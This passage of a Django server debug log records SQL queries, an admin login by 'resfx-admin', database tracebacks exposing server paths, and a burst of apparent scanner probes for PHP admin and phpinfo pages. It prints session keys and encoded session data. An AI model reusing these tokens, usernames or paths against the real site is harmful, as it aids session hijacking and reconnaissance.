tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 09:28:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 09:28:03,370 utils 26999 140702522537728 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:03.356453+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 9, 28, 3, 356453, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 09:28:03,417 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T09:28:03.414310+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 9, 28, 3, 414310, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 09:28:03] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /favicon.ico [29/Nov/2019 09:28:04] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-11-29 09:28:14,589 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:14.581006+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 9, 28, 14, 581006, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 09:28:14,593 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-11-29 09:28:14,809 utils 26999 140702522537728 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9' LIMIT 1; args=('8ojyyz7puuibh7rtqntt8ci0gyabthm9',) DEBUG 2019-11-29 09:28:14,810 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8ojyyz7puuibh7rtqntt8ci0gyabthm9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T09:28:14.809576+00:00'::timestamptz); args=('8ojyyz7puuibh7rtqntt8ci0gyabthm9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 9, 28, 14, 809576, tzinfo=)) DEBUG 2019-11-29 09:28:14,812 utils 26999 140702522537728 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('rzwvbkeshzbhujlqsc3hq0crzngpypvg',) DEBUG 2019-11-29 09:28:14,813 utils 26999 140702522537728 (0.000) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=('rzwvbkeshzbhujlqsc3hq0crzngpypvg',) DEBUG 2019-11-29 09:28:14,815 utils 26999 140702522537728 (0.001) UPDATE "auth_user" SET "last_login" = '2019-11-29T09:28:14.814439+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 11, 29, 9, 28, 14, 814439, tzinfo=), 6) DEBUG 2019-11-29 09:28:14,818 utils 26999 140702522537728 (0.000) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T09:28:14.817540+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 9, 28, 14, 817540, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [29/Nov/2019 09:28:14] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-11-29 09:28:15,122 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:15.112800+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 11, 29, 9, 28, 15, 112800, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-11-29 09:28:15,124 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 09:28:15,161 utils 26999 140702522537728 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-11-29 09:28:15,163 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T09:28:15.162163+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 9, 28, 15, 162163, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [29/Nov/2019 09:28:15] "GET / HTTP/1.0" 200 6019 [29/Nov/2019 09:28:15] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [29/Nov/2019 09:28:15] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [29/Nov/2019 09:28:15] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [29/Nov/2019 09:28:15] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 DEBUG 2019-11-29 09:28:22,808 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:22.798348+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 11, 29, 9, 28, 22, 798348, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-11-29 09:28:22,811 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 09:28:22,815 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-11-29 09:28:22,857 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC LIMIT 21; args=() DEBUG 2019-11-29 09:28:22,859 utils 26999 140702522537728 (0.000) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC LIMIT 21; args=() Internal Server Error: /shop/product/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_product" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_product" ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 606, in wrapper return self.admin_site.admin_view(view)(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/sites.py", line 223, in inner return view(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 45, in _wrapper return bound_method(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 1672, in changelist_view cl = self.get_changelist_instance(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 744, in get_changelist_instance sortable_by, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 82, in __init__ self.get_results(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 210, in get_results result_count = paginator.count File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/paginator.py", line 91, in count return c() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 392, in count return self.query.get_count(using=self.db) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 504, in get_count number = obj.get_aggregation(using, ['__count'])['__count'] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 489, in get_aggregation result = compiler.execute_sql(SINGLE) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_product" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_product" ^ [29/Nov/2019 09:28:23] "GET /shop/product/ HTTP/1.0" 500 174993 DEBUG 2019-11-29 09:28:25,723 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:25.714753+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 11, 29, 9, 28, 25, 714753, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-11-29 09:28:25,726 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 09:28:25,757 utils 26999 140702522537728 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-11-29 09:28:25,760 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T09:28:25.759216+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 9, 28, 25, 759216, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [29/Nov/2019 09:28:25] "GET / HTTP/1.0" 200 6019 DEBUG 2019-11-29 09:28:33,099 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:33.090847+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 11, 29, 9, 28, 33, 90847, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-11-29 09:28:33,102 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 09:28:33,104 utils 26999 140702522537728 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-11-29 09:28:33,105 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 09:28:33,106 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 09:28:33,110 utils 26999 140702522537728 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-11-29 09:28:33,188 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T09:28:33.187364+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 9, 28, 33, 187364, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [29/Nov/2019 09:28:33] "GET /auth/user/ HTTP/1.0" 200 8687 [29/Nov/2019 09:28:33] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-11-29 09:28:33,539 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:33.530648+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 11, 29, 9, 28, 33, 530648, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-11-29 09:28:33,541 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [29/Nov/2019 09:28:33] "GET /jsi18n/ HTTP/1.0" 200 3223 [29/Nov/2019 09:28:33] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [29/Nov/2019 09:28:33] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [29/Nov/2019 09:28:33] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [29/Nov/2019 09:28:33] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [29/Nov/2019 09:28:33] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [29/Nov/2019 09:28:33] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [29/Nov/2019 09:28:33] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [29/Nov/2019 09:28:34] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [29/Nov/2019 09:28:34] "GET /static/admin/img/search.svg HTTP/1.0" 200 458 [29/Nov/2019 09:28:34] "GET /static/admin/img/icon-no.svg HTTP/1.0" 200 560 [29/Nov/2019 09:28:34] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 200 436 [29/Nov/2019 09:28:35] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [29/Nov/2019 09:28:35] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 [29/Nov/2019 09:32:18] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:37:24] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:42:33] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:47:38] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:52:45] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:57:52] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:58:35] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:02:57] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:05:11] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:05:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:08:03] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:13:10] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:18:15] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:20:07] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Nov/2019 10:20:07] "GET /robots.txt HTTP/1.0" 404 6405 Not Found: /Adminb5512046/Login.php [29/Nov/2019 10:20:08] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6445 [29/Nov/2019 10:20:10] "GET / HTTP/1.0" 302 0 Not Found: /l.php [29/Nov/2019 10:20:10] "GET /l.php HTTP/1.0" 404 6390 Not Found: /phpinfo.php [29/Nov/2019 10:20:11] "GET /phpinfo.php HTTP/1.0" 404 6408 Not Found: /test.php [29/Nov/2019 10:20:11] "GET /test.php HTTP/1.0" 404 6399 Not Found: /index.php [29/Nov/2019 10:20:12] "POST /index.php HTTP/1.0" 404 6403 Not Found: /bbs.php [29/Nov/2019 10:20:12] "POST /bbs.php HTTP/1.0" 404 6397 Not Found: /forum.php [29/Nov/2019 10:20:13] "POST /forum.php HTTP/1.0" 404 6403 Not Found: /forums.php [29/Nov/2019 10:20:14] "POST /forums.php HTTP/1.0" 404 6406 Not Found: /bbs/index.php [29/Nov/2019 10:20:15] "POST /bbs/index.php HTTP/1.0" 404 6415 Not Found: /forum/index.php [29/Nov/2019 10:20:15] "POST /forum/index.php HTTP/1.0" 404 6421 Not Found: /forums/index.php [29/Nov/2019 10:20:16] "POST /forums/index.php HTTP/1.0" 404 6424 DEBUG 2019-11-29 10:20:16,593 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) DEBUG 2019-11-29 10:20:16,616 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 10:20:16,617 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:20:16,618 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:20:16,618 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-11-29 10:20:16,619 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:20:16,620 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-11-29 10:20:16,621 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-11-29 10:20:16,622 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) Internal Server Error: /webdav/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, 